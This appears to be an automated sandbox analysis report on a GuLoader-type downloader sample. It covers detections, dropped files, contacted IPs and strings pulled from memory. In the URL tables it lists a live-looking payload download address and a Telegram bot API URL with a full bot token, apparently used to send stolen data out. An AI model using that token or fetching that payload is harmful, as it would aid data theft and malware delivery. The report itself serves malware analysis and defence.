.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	22%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com05	0%	Avira URL Cloud	safe
http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
http://kUYmnxF1L3RMXTOEA.ne	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe
http://kUYmnxF1L3RMXTOEA.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
http://zFeqMl.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.56.57.22/MY%20AIRTEL%20TELEGRAM%20STUB_iHQdRhQNdR56.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.certum.pl/ctsca2021.crl0o	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
https://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocumentdocument-----	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
https://api.telegram.org	CasPol.exe, 0000000C.00000002.6153695657.000000001D6DD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctsca2021.cer0	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
http://crl.certum.pl/ctnca.crl0k	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
http://subca.ocsp-certum.com05	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false	Avira URL Cloud: safe	unknown
http://kUYmnxF1L3RMXTOEA.ne	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false	Avira URL Cloud: safe	unknown
http://kUYmnxF1L3RMXTOEA.net	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.6153633788.000000001D6D9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.1443175396.000000001C411000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://zFeqMl.com	CasPol.exe, 0000000C.00000002.6152117405.000000001D5A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
http://repository.certum.pl/ctnca2.cer09	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
https://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocument	CasPol.exe, 0000000C.00000002.6153695657.000000001D6DD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
http://api.telegram.org	CasPol.exe, 0000000C.00000002.6153855558.000000001D6F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 0000000C.00000002.6153695657.000000001D6DD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	false		high
https://github.com/dotnet/runtime	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1923518409.0000000002876000.00000004.00000800.00020000.00000000.sdmp, System.IO.UnmanagedMemoryStream.dll.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	unknown	United Kingdom		62041	TELEGRAMRU	false
2.56.57.22	unknown	Netherlands		395800	GBTCLOUDUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	632606
Start date and time: 23/05/202221:02:03	2022-05-23 21:02:03 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/10@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 28.3% (good quality ratio 27.9%) Quality average: 87.8% Quality standard deviation: 21.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 87 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, BackgroundTransferHost.exe, UserOOBEBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe, MusNotificationUx.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:04:32	API Interceptor	2796x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	6kc4QFf5Sh.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetectNet.01.4151.exe	Get hash	malicious	Browse
	Avviso di pagamento.exe	Get hash	malicious	Browse
	presupuesto .xlsx	Get hash	malicious	Browse
	f8.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetectNet.01.3392.exe	Get hash	malicious	Browse
	ungziped_file.exe	Get hash	malicious	Browse
	220523_AIT UV_922850.exe	Get hash	malicious	Browse
	Cotizaci#U00f3n MT T-819.exe	Get hash	malicious	Browse
	54465.pdf.exe	Get hash	malicious	Browse
	Halkbank_Ekstre_20220521_075518_627301.pdf.exe	Get hash	malicious	Browse
	EXuhiPTK04.exe	Get hash	malicious	Browse
	Midnight.exe	Get hash	malicious	Browse
	SOA # 87594094.xlsx	Get hash	malicious	Browse
	PO. 4500129645.pdf.exe	Get hash	malicious	Browse
	doc2022052000010030010101.exe	Get hash	malicious	Browse
	32#U0e22.exe	Get hash	malicious	Browse
	Installer.exe	Get hash	malicious	Browse
	Midnight.exe	Get hash	malicious	Browse
	Sihost67.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	6kc4QFf5Sh.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.4151.exe	Get hash	malicious	Browse	149.154.167.220
	Avviso di pagamento.exe	Get hash	malicious	Browse	149.154.167.220
	presupuesto .xlsx	Get hash	malicious	Browse	149.154.167.220
	f8.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetectNet.01.3392.exe	Get hash	malicious	Browse	149.154.167.220
	6523.exe	Get hash	malicious	Browse	149.154.167.99
	ungziped_file.exe	Get hash	malicious	Browse	149.154.167.220
	Setup.exe	Get hash	malicious	Browse	149.154.167.99
	220523_AIT UV_922850.exe	Get hash	malicious	Browse	149.154.167.220
	Cotizaci#U00f3n MT T-819.exe	Get hash	malicious	Browse	149.154.167.220
	54465.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20220521_075518_627301.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	EXuhiPTK04.exe	Get hash	malicious	Browse	149.154.167.220
	Midnight.exe	Get hash	malicious	Browse	149.154.167.220
	SOA # 87594094.xlsx	Get hash	malicious	Browse	149.154.167.220
	PO. 4500129645.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	doc2022052000010030010101.exe	Get hash	malicious	Browse	149.154.167.220
	32#U0e22.exe	Get hash	malicious	Browse	149.154.167.220
	Installer.exe	Get hash	malicious	Browse	149.154.167.220

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Get hash	malicious	Browse
	Cotizaci#U00f3n MT T-819.exe	Get hash	malicious	Browse
	Cotizaci#U00f3n MT T-819.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Artemis2A130FA40314.26375.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Artemis2A130FA40314.26375.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll	EUR_Cert_3883774784847_CMR8494849.pdf.scr.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Get hash	malicious	Browse
	EUR_Cert_3883774784847_CMR8494849.pdf.scr.exe	Get hash	malicious	Browse
	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe	Get hash	malicious	Browse
	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe	Get hash	malicious	Browse
	FSC#U007e029872652425_9387636MIG.exe	Get hash	malicious	Browse
	FSC#U007e029872652425_9387636MIG.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Babar.54324.15185.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Babar.54324.15185.exe	Get hash	malicious	Browse
	CPfUbF38MW.exe	Get hash	malicious	Browse
	RFQ - 100932843 - 1000219266_MAY 2022.exe	Get hash	malicious	Browse
	CPfUbF38MW.exe	Get hash	malicious	Browse
	RFQ - 100932843 - 1000219266_MAY 2022.exe	Get hash	malicious	Browse
	FRT_INV_MIE29727361008_76.xlsx	Get hash	malicious	Browse
	FRT_INV_MIE29727361008_76.xlsx	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe	Get hash	malicious	Browse
	New Tender of National Electricity Company TRISTAN 02 ltd BULGARIA.exe	Get hash	malicious	Browse
	72EED30398363-0983BNDJ0398763536.exe	Get hash	malicious	Browse
	72EED30398363-0983BNDJ0398763536.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Adventure_12.bmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	9906
Entropy (8bit):	7.910073068079041
Encrypted:	false
SSDEEP:	192:oXRlr7xecYaInXHtyMkC0RmLKZDjCYsPLcIXSZVYLuL:KRVUUIXgMkCSoe7tL
MD5:	A509568F18F3FF9C50EBFB2ACD499AA5
SHA1:	624E862D51655A6759151252963354F1520F0097
SHA-256:	5DDAFCD2247F1945099ECDE40D93F60C55D0B27F83D46B602909D55399BA635B
SHA-512:	32D090B101DC16D6A464C2D67D7870CD46E334031EE4ADE0F6255952CEB7141118C595FB8ADAF1ED04BFAB88CFAF9856A2AE5C5315AB9A9AF3E299816AEDC822
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....4.........s......`..Ki.#........>N....H.).T... .".S5..A..,..../W.3...\|.q...1.;O...../.I......2...oT..1...Y..;....be.Y.qE~w..,..w......d.....q{ymo....D...V\K.H...F....,6.....i...9.._.......L....%....I..+.0..C\....bs.R....?....<W.3..+..._.W_...~......f.....3i...F.".z.FkX..DF......R.......?k

C:\Users\user\AppData\Local\Temp\Lydabsorberende2.Eks

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	data
Category:	dropped
Size (bytes):	23181
Entropy (8bit):	7.990994965748802
Encrypted:	true
SSDEEP:	384:84XmU94OtQbjBI9OrBQo6+inPK/smjmMA+9dFkj80lAug7woAR/vZKoF08HQDxFd:bb6jBqPocK/smBAGdFylld79/woCzN8U
MD5:	0D972D4681D2BDD6A506A86DA5A1C85E
SHA1:	84662467F7DA4A541729A3A2174E8373F7B7BBCD
SHA-256:	6303DF45ACDC13A98D4208F1A56AE86BB051ED3E6F2EEF4650ABCEDB34AEADFA
SHA-512:	9BEB7191CCF7B75255BA17AD11BF437864EC9471DC5DBE9FC9EAD3A8692A9C8E69246DA9A679F78A426184DDB7850E4875720D20423F2B2B53ACF313626AC8DA
Malicious:	false
Preview:	......z.U...U......[.b..BI.n.. H....D.........K:.\|7.>43..wII......!..!~Fr^"Q..b:...-.....y).s....e?...:.[.v)iz..G.Q...&.I>.\..O.J...E..C.....X..8.We}R.rH.b.................Q{.I.c..P&Q.;...y..<f".u>.M....u{v+.)..........).9 ......G:.IH.V..0bsk..n.S[&$..Qpo....m.}.0LN.H!..t.(......y!.....>o...P......z{.?.e.=....b.......k$..~l7R@.....9..q_.......P...=..._.v...\|..,U6....6....J1.8....$..`[...C...a$....j..f.Y.k.w..+.3:V.Z...Gs.e(..F....^...a.....L$,....:V=.\_.^.b/.f..c...X.......d.....i....v=.Sc..t....{8.....P4..M.2.X9...g...{.52..a%y.6..'\|8.......!3~[.t.w...7w...M...a.j=....$u{...^..)J.J..-.I...)C7..J.p.a....#.IT.s1.0..K..#V.7.L.\| .}..Z.Q\;..\|.i.4..}H..!.I."?....C~.....%..n.b..E.3..P........,.}. 5{.E....p.r)..L<..@zu7j..7h$DV.hO."...1..8U.[....r4.I$W.U.. M.$.i+...[..kEz.t;..<A..*[E..R.}z...a.3..,.,.E...!.5...f..FC...z.........g./..KK.r..(`..'...L.LC........Ntz\|..V+....}iK.;X/.},..Lp;-K......~.Ro&40..."L..Zx....X..."-=t.^!...<

C:\Users\user\AppData\Local\Temp\Pilkedes4.AFM

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	data
Category:	dropped
Size (bytes):	85536
Entropy (8bit):	6.450553024590124
Encrypted:	false
SSDEEP:	768:qwz+WsmsiZUL3RDSQLefRLp3zFXs98T/ExDNnHBRXKiN9OOWp7wPkomrptIepi+s:qwz+wUjfLeLBXnLw/7gcPMIP+hO
MD5:	FC18E33AF950762F0854EE273723A9D5
SHA1:	CF2D571EF653FA35F961587296B26018F6D0C64A
SHA-256:	3C55B767A8B4E82B4607EF9CDC48C212D7CDAE3830E567F4A9C2C46A34E3BEAD
SHA-512:	E974480F6E9A96A69D46411A195E75BF8E32528417C7865C7847E9C6CDD4B712CECACC0C26C4800075947088D3617409C5BC3FF57119D819D2D7C0B18F559901
Malicious:	false
Preview:	f.u.f.f...f.t......&.U....................................4...f.i.............pJ................................f.........&?ix............................................................:.n.................................f.d.......7..Pv..........................................................f.k.........nz..................................n.....f....43.R][[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[f.....f.........-"..!\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\f..M......f.n..3..:uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuf................6.[ao}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}...f.........3n.5j..................................................:F.........r..f.d..5.o.`.................................................!............(.>.U...............................................f.q.7...4..e9...................................................................`F.............................f.........`......(X.Q,..........................................f.n.

C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	14440
Entropy (8bit):	6.682915152434376
Encrypted:	false
SSDEEP:	192:0BzGbXwRxx025WJ+WqlSWOL8/pCuPHnhWgN7aYWsB3gmZdGP2qnaj4FnH+a:oww7+25WJ+Wql+/uPHRN7BB3v3Llqea
MD5:	4075327E8E558810E05E67CE8E246864
SHA1:	F136E540C8439548EFF62BE1161F16A01CB0D060
SHA-256:	25211A075C941DFC9C363547A9EE4442981A4FBCA0C32EA705E94D086D57DAA3
SHA-512:	B557516E7121DEE78FA4D228FCF1351071D2AD6FC8F27142D4C6FB1B78F70DCB0993F8BE90F7247DBBEC3D3100307329F04F8EA90C9E93F7B618EFC7150D5A6D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, Detection: malicious, Browse Filename: Cotizaci#U00f3n MT T-819.exe, Detection: malicious, Browse Filename: Cotizaci#U00f3n MT T-819.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Artemis2A130FA40314.26375.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Artemis2A130FA40314.26375.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....x..........."!..0..............)... ........@.. ..............................P.....`.................................\|)..O....@..................h$...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................L....c.y.....>(#W..!...h...$...4V.I..4..w..?'....4a\..F..SG..rH.y......zy...:...C'..t$...6.?yrlQ..D..9...OM....<G.k....B.BSJB............v4.0.30319......`.......#~..<.......#Strings....,.......#GUID...<.......#Blob......................3................................................,...........E...........p.......W.................^...+.^.....^...e.^.....^.....^.....^...L.^...Y.^.................

C:\Users\user\AppData\Local\Temp\applications-utilities-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	606
Entropy (8bit):	4.666157566747791
Encrypted:	false
SSDEEP:	12:t4CDqW/ZWcdg+tKAPXUWU4NM0ByWoZLa8jCOopqGEA9A0/:t4CTg+tKA8WDec8YqGEAl/
MD5:	26B03DAAD39CD54B2343C49AF59F2091
SHA1:	D2C0728804B143D70A6BC6752A873BBA468C3E1D
SHA-256:	2EF30F51766DEAA27FECF4ECAF46404D0C37D902E39FE43E2F656CD488041FB2
SHA-512:	83C528C85B1F7067D134717AEC1638E8FA20E8DAA595E1FBA2F5ECEC747841E36B626C2026ECB61DE9F67A7E3C4D2B0992F71C11F76AA019D36A9E4C4A307CA1
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.934 0h.132C4.692 0 6 1.332 6 2.986v10.028C6 14.668 4.692 16 3.066 16h-.132C1.308 16 0 14.668 0 13.014V2.986C0 1.332 1.308 0 2.934 0zm2.594 0c.878.714 1.469 1.793 1.469 3v1h2.125c-.075-1.092 1.248-2 2-2 .68 0 1 .012 1 1v1h1.218c1.229-.6 1.782-1.969 1.782-2.687 0-.736-2.386-1.312-3.688-1.312zM7 5v4.313c2.766 2.662 6.125 2.406 6.125 2.406s.353-1.52-1.906-4.03L8.844 5H7.063C7.04 5.003 7.02 4.999 7 5zm2.975 2.532L11.66 9.27c-1.8.166-2.151-.856-1.684-1.737z" style="marker:none" overflow="visible" color="#000" fill="#474747"/></svg>

C:\Users\user\AppData\Local\Temp\camera-photo-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	226
Entropy (8bit):	6.609529349840206
Encrypted:	false
SSDEEP:	6:6v/lhPysfQu6kkLKgiFG34McOULPqSax5na/p:6v/7FPk9iHMUeSauR
MD5:	AFE0B10777804AE446C5E4A3F3C2E3B5
SHA1:	0252C67682C9A5D7260BA70DC03E4091ED9A0923
SHA-256:	4C42D37B6A5ED6F3230A1506A6BC4687AEF8146174666C0BCCAD8FE2E6DD75B5
SHA-512:	D76318428038B81D1C29C5812BD22F53DFF53AE93FE86305CD76B750F39BD785EBB9CA69475137CE9A00A4DC588DB4D0C077B723AC847782123C3359E981A9B4
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8..1..P.C_.Aj...............O.A..KY.\|...b.VS.7x...../...BG.n.z.Tu......9.........X.V.pD....W...(...e...V...{..0...&...\|2.l.+m..3..i..3......?[....u....IEND.B`.

C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: EUR_Cert_3883774784847_CMR8494849.pdf.scr.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, Detection: malicious, Browse Filename: EUR_Cert_3883774784847_CMR8494849.pdf.scr.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, Detection: malicious, Browse Filename: FSC#U007e029872652425_9387636MIG.exe, Detection: malicious, Browse Filename: FSC#U007e029872652425_9387636MIG.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Babar.54324.15185.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Babar.54324.15185.exe, Detection: malicious, Browse Filename: CPfUbF38MW.exe, Detection: malicious, Browse Filename: RFQ - 100932843 - 1000219266_MAY 2022.exe, Detection: malicious, Browse Filename: CPfUbF38MW.exe, Detection: malicious, Browse Filename: RFQ - 100932843 - 1000219266_MAY 2022.exe, Detection: malicious, Browse Filename: FRT_INV_MIE29727361008_76.xlsx, Detection: malicious, Browse Filename: FRT_INV_MIE29727361008_76.xlsx, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.29800.exe, Detection: malicious, Browse Filename: New Tender of National Electricity Company TRISTAN 02 ltd BULGARIA.exe, Detection: malicious, Browse Filename: 72EED30398363-0983BNDJ0398763536.exe, Detection: malicious, Browse Filename: 72EED30398363-0983BNDJ0398763536.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\resume-vm-default.bat

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

C:\Users\user\AppData\Local\Temp\wab32res.dll.mui

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
